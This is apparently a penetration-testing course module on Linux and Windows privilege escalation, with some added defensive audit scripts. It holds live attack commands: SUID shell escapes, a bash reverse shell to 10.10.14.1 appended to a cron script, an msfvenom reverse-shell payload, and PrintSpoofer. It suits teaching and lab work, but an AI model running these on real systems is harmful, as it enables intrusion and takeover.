Local Privilege Escalation

Module Overview

This module covers techniques and methodologies for escalating privileges on compromised systems across different operating systems.

Learning Objectives

By the end of this module, you will be able to:

  • Understand privilege escalation concepts and attack vectors
  • Perform Linux privilege escalation techniques
  • Execute Windows privilege escalation methods
  • Utilize automated enumeration tools
  • Apply manual enumeration techniques

Privilege Escalation Fundamentals

graph TD
    A[Initial Access] --> B[Enumeration]
    B --> C{OS Type?}
    C -->|Linux| D[Linux PrivEsc]
    C -->|Windows| E[Windows PrivEsc]
    D --> F[Automated Tools]
    E --> F
    F --> G[Manual Techniques]
    G --> H[Root/SYSTEM Access]

Key Concepts

| Concept | Description | Impact Level |
|---|---|---|
| Vertical Escalation | Moving from a lower to a higher privilege level | High |
| Horizontal Escalation | Moving between accounts at the same privilege level | Medium |
| Kernel Exploits | Exploiting OS kernel vulnerabilities | Critical |
| Misconfiguration | Leveraging system misconfigurations | Variable |

Linux Privilege Escalation

System Enumeration

# System information
uname -a
cat /etc/os-release

# Current user and groups
id
groups

# Sudo permissions
sudo -l

# Running processes
ps aux | grep root

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# Services
systemctl list-units --type=service --state=running

# SUID binaries
find / -perm -4000 -type f 2>/dev/null

# World-writable files
find / -perm -002 -type f 2>/dev/null

# Files owned by current user
find / -user $(id -u) -type f 2>/dev/null

Common Attack Vectors

SUID Binary Exploitation

GTFOBins Example

# Check for vulnerable SUID binaries
find / -perm -4000 -type f 2>/dev/null | grep -E "(vim|nano|less|more)"

# Exploit vim SUID
vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Cron Job Exploitation

# Check for writable cron scripts
ls -la /etc/cron.d/
cat /etc/crontab

# Example exploitation
echo "bash -i >& /dev/tcp/10.10.14.1/4444 0>&1" >> /vulnerable/script.sh
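The weakness the cron section relies on is a scheduled script that a non-root user can modify. The following audit script is an added example, not part of the original module: it reads a system crontab, resolves each referenced script and reports any that are group- or world-writable. The crontab and scripts it checks in `demo_audit` are constructed in a temporary directory purely for demonstration.

```shell
#!/bin/sh
# Added example (not from the original page): report cron scripts that a
# non-root user could edit, the misconfiguration behind cron job exploitation.

# audit_cron_scripts <crontab-file>
# Prints "WEAK <path>" for every referenced script that is group- or world-writable.
audit_cron_scripts() {
    # System crontab fields: m h dom mon dow user command, or @reboot user command.
    # Skip comments, blank lines and variable assignments such as SHELL=/bin/sh.
    grep -Ev '^[[:space:]]*(#|[A-Za-z_]+=)|^[[:space:]]*$' "$1" |
        awk '$1 ~ /^@/ { print $3; next } { print $7 }' |
        while IFS= read -r script; do
            [ -f "$script" ] || continue
            # POSIX find: -perm -020 = group write bit set, -perm -002 = other write bit set
            if [ -n "$(find "$script" \( -perm -020 -o -perm -002 \) -print)" ]; then
                printf 'WEAK %s\n' "$script"
            fi
        done
}

# demo_audit: constructed data only. Builds a crontab that references one
# correctly permissioned script (0755) and one world-writable script (0777),
# audits it, then removes the temporary directory.
demo_audit() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$d/backup.sh"
    chmod 755 "$d/backup.sh"
    printf '#!/bin/sh\necho cleanup\n' > "$d/cleanup.sh"
    chmod 777 "$d/cleanup.sh"
    cat > "$d/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * * root $d/backup.sh
@reboot root $d/cleanup.sh
EOF
    audit_cron_scripts "$d/crontab"
    rm -rf "$d"
}

demo_audit
```

On a real host, run `audit_cron_scripts /etc/crontab` and repeat for each file under /etc/cron.d; only the world-writable cleanup.sh is reported in the demo.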

Mathematical Analysis

Assuming the attack vectors are independent, the probability that at least one of n vectors succeeds can be modeled as:

\[P(success) = 1 - \prod_{i=1}^{n} (1 - p_i)\]

where \(p_i\) is the probability that attack vector i succeeds on its own, so the product is the probability that all n vectors fail.

Windows Privilege Escalation

PowerShell Enumeration

# System details
Get-ComputerInfo
Get-WmiObject -Class Win32_OperatingSystem

# User information
whoami /all
net user $env:USERNAME

# Group memberships
net localgroup

# Services running as SYSTEM
Get-WmiObject win32_service | Select Name, StartName, PathName

# Unquoted service paths (only paths that contain a space are affected)
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select Name, PathName

# Service permissions
Get-Acl -Path "C:\Program Files\VulnerableApp\service.exe" | Format-List

# AutoRuns
Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Always Install Elevated (the policy only applies when both the HKLM and HKCU values are set)
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"

# Stored credentials
cmdkey /list

Attack Techniques

Unquoted Service Paths

# Identify vulnerable service
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -like "*Program Files*" -and $_.PathName -notlike '*"*'}

# Create malicious executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f exe > Program.exe

# Place in vulnerable path
copy Program.exe "C:\Program Files\Vulnerable App\Program.exe"
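Why `Program.exe` in `C:\Program Files` is the file that gets run: when a service path is unquoted, each space in it is a possible end of the executable name, and Windows tries the shorter names first. The function below is an added example, not from the original module, written in portable sh/awk so it runs anywhere: given a Win32_Service PathName it lists every file that would be tried before the intended binary, i.e. the locations a defender must confirm are not writable by standard users. The PathName values in `demo_paths` are constructed samples.

```shell
#!/bin/sh
# Added example (not from the original page): enumerate the files Windows
# would try before the real binary for an unquoted service path with spaces.

# unquoted_path_candidates '<PathName>'
# Prints nothing for a quoted path or a path whose first token already names
# the binary; otherwise prints the candidate files in the order tried.
unquoted_path_candidates() {
    printf '%s\n' "$1" | awk '
        /^"/ { exit }                          # quoted path: not affected
        {
            n = split($0, parts, " ")          # split on the spaces in the path
            prefix = ""
            for (i = 1; i < n; i++) {
                prefix = (i == 1) ? parts[i] : prefix " " parts[i]
                if (prefix ~ /\.[A-Za-z0-9]+$/) exit   # reached the real binary
                print prefix ".exe"            # no extension: Windows appends .exe
            }
        }'
}

# demo_paths: constructed PathName samples in the form Get-WmiObject reports them
demo_paths() {
    for p in 'C:\Program Files\Vulnerable App\service.exe' \
             '"C:\Program Files\Quoted App\service.exe"' \
             'C:\Windows\system32\svchost.exe -k netsvcs'; do
        printf '== %s\n' "$p"
        unquoted_path_candidates "$p"
    done
}

demo_paths
```

For the first sample this prints `C:\Program.exe` and `C:\Program Files\Vulnerable.exe`; the quoted path and the svchost path produce no candidates, which is why quoting the path is the fix.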

Token Impersonation

SeImpersonatePrivilege

If the current user has SeImpersonatePrivilege, tools like JuicyPotato or PrintSpoofer can be used for privilege escalation.

# Check privileges
whoami /priv

# Use PrintSpoofer
PrintSpoofer.exe -i -c cmd

Automated Tools

Linux Tools Comparison

| Tool | Description | Detection Evasion | Ease of Use | Coverage |
|---|---|---|---|---|
| LinPEAS | Comprehensive Linux privilege escalation scanner | Medium | High | Excellent |
| LinEnum | Classic Linux enumeration script | Low | High | Good |
| LSE | Linux Smart Enumeration with color coding | Medium | High | Very Good |
| unix-privesc-check | Thorough UNIX privilege escalation checker | Low | Medium | Good |
| SUID3NUM | SUID binary exploitation helper | High | Medium | Focused |
| pspy | Process monitoring without root privileges | High | Medium | Specialized |
| BeRoot | Multi-platform privilege escalation checker | Medium | High | Good |

Windows Tools Matrix

Tool Technique Coverage Ease of Use Detection Risk
WinPEAS
PowerUp
Seatbelt
SharpUp

Practical Exercises

Exercise 1: Linux SUID Enumeration

Challenge

Enumerate and exploit SUID binaries on a target Linux system.

Solution Steps

  1. Enumerate SUID binaries:

    find / -perm -4000 -type f 2>/dev/null

  2. Check GTFOBins for exploitation methods

  3. Execute privilege escalation:

    # Example with find
    find . -exec /bin/sh -p \; -quit

Exercise 2: Windows Service Exploitation

Challenge

Identify and exploit an unquoted service path vulnerability.

Solution Approach

flowchart LR
    A[Enumerate Services] --> B[Identify Unquoted Paths]
    B --> C[Check Write Permissions]
    C --> D[Create Malicious Binary]
    D --> E[Restart Service]
    E --> F[Gain SYSTEM Shell]

Key Takeaways

Critical Points

  • Enumeration is key - Thorough system enumeration often reveals multiple privilege escalation vectors
  • Combine techniques - Use both automated tools and manual methods for comprehensive coverage
  • Understand the environment - Different OS versions and configurations require different approaches
  • Persistence matters - Consider maintaining access after successful escalation

This module provides a foundation for understanding and implementing privilege escalation techniques across different operating systems and environments.